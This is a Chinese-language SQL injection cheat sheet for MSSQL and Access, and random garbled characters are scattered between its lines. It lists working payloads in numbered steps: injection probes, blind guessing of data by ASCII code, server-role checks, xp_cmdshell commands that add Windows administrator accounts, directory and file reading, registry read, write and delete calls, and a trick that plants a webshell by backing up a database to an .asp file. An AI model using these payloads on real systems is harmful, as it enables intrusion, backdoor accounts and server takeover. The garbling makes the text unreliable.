1.判断是否有注入;and 1=1 ;and 1=2 "�?v{�?�,@
2.初步判断是否是mssql ;and user>0 #5X�535'ze
D�IBoIWSuR
3.注入参数是字符'and [查询条件] and ''=' %EE�Q�^l�m
u�3v�M�!��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wfQ^�3�HL�
*O'�`&�J
5.判断数据库系统 H&So��Vi_V
\�e9rXh�%�
;and (select count(*) from sysobjects)>0 mssql ��9A,�ok[J
e#odr{2#4u
;and (select count(*) from msysobjects)>0 access #?C�.%��kD
8/s?�Gz�
iH��KX#��*
l05'/�duuJ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 W�9!K~�g_�
b��'�%)?{E
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 K_ �Od�u^�
H b?0?^�#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �7�g|EqJ�7
]Ns�)fr��6
9.(1)猜字段的ascii值(access) 2 9�#�jKh�
�i]�1�5g�@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �J%FF@.)�k
Q ��6n!�u;
(2)猜字段的ascii值(mssql) 72�2:�2 �{
1) Nj.#)��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 $X��,dQ]M�
T^icoX=�c4
10.测试权限结构(mssql) fS$�;~�@p�
L6.�/5`bs
N/7�8�U�b�
JbA�mud,��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��`\$E�PUM
�?$#P
=�VK
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- g'��Ax�J��
�&B\ sG�=�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -B�&
Nou��
�>h�Y.�F/[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- q�TSe_Re��
F��:og��:[
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 3EH�B~rL/C
S�,�x';"�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Jw�Q/�A[�b
YQ�ca��Wd(
;and 1=(select IS_MEMBER('db_owner'));-- ;I?x;���lH
{�y'4&vt<~
zpj�E�_�|�
�wjfq"��7Q
11.添加mssql和系统的帐户 �Iz[ohn!f
O-hu�C:zZh
;exec master.dbo.sp_addlogin username;-- ^��YJ%�^�P
;exec master.dbo.sp_password null,username,password;-- {�is��L�<�
c:[�ZknnCe
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- /;k��Sa}"Q
{�[�3xi`0-
;exec master.dbo.xp_cmdshell 'net user username password �JvK]EwR
;
�/�+1(�,�S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- O?O=�]s�
u
Tw7�]�� ��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -�Q�wH|���
�R1�*4����
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- )_1 GPS�
yR�IXUC�y
XMiu�}��w!
UO�k\fyD2[
12.(1)遍历目录 VZq�~� �-$
#wo
�*2��(
;create table dirs(paths varchar(100), id int) �NSB�cYObX
I~�:gi@OVV
;insert dirs exec master.dbo.xp_dirtree 'c:\' OQ-
�Hn�-H
[F'|�KcE3�
;and (select top 1 paths from dirs)>0 6T4I,XrY_F
�6i�2�%EC9
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) |JP19KFx'B
Bp3E)��l��
Z %Ozzp/��
cP���D_=.&
(2)遍历目录 ]8}51���y8
T�N1pg����
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- b�>Y{,�`E3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �Xl$,�f`f~
4(�|yl^w��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,zltNbu\.(
�/("7*W��2
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 s�2#Ia>5!�
�h%krA<G9�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 %IX)+
�Lp`
BBRL����_6
>WIc�"��y.
�fEX=csZ86
13.mssql中的存储过程 �l6y}��>]�
XTo7fbW�*�
xp_regenumvalues 注册表根键, 子键 XzHR^^;u"*
�USEb}� M`
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 qyv=ot0"~F
0�Gc@�AG�{
xp_regread 根键,子键,键值名 �� C/IF~<B
E�U�%,tp �
;exec xp_regread ?�9�kC�[4G
�:-B+�W9'5
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �pA�6KiY�&
�Y @p<f5[c
xp_regwrite 根键,子键, 值名, 值类型, 值 �a:�f���P�
m�{/(��
�3
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 +�cfEy�iub
G{3�|d/;Bt
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �XP:A"WK�"
)1�uiY
f&k
xp_regdeletevalue 根键,子键,值名 N��O�o��?�
G}fB��d���
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��<�X:JMj+
#$I@V�4O;#
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �Uj):}xgi'
�#h5lz%2g�
�u�iVN�z8H
V4:/LN�q_]
14.mssql的backup创建webshell 7ne�k,8b�
JWix��Y��/
use model QB*,+��u4�
>R+-mP�!nj
create table cmd(str image); �{^WK�#$�]
Et�Kq.�<SJ
insert into cmd(str) values (''); 2�R[v*i^�S
"m�K`3</�G
backup database model to disk='c:\l.asp'; MJ|tfQwh�x
�V\cbIx(Z^
?�woL17Gt�
^�M'(/O1�
15.mssql内置函数 Q$E�.G63Wl
'�J,UKK\�5
;and (select @@version)>0 获得Windows的版本号 r#sg5aS7O|
q�Gk.7�wf%
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WH�:dc�U��
:��_8K8S�a
;and (select user_name())>0 爆当前系统的连接用户 �Zc��N0:xU
>Xn,�jMUW�
;and (select db_name())>0 得到当前连接的数据库 sL$sj|"�S�
.U!�EA0�B�
7=P)��`��@
��D�v��g'�
16.简洁的webshell K�xsd��@^E
U%��h�.l��
use model ^E70�$yB�^
Y&6��jFT_
create table cmd(str image); �\�.i7(�J]
�qs]W2{-4~
insert into cmd(str) values (''); L��Je�q{Z�
G_F_�TNO��
backup database model to disk='g:\wwwtest\l.asp';
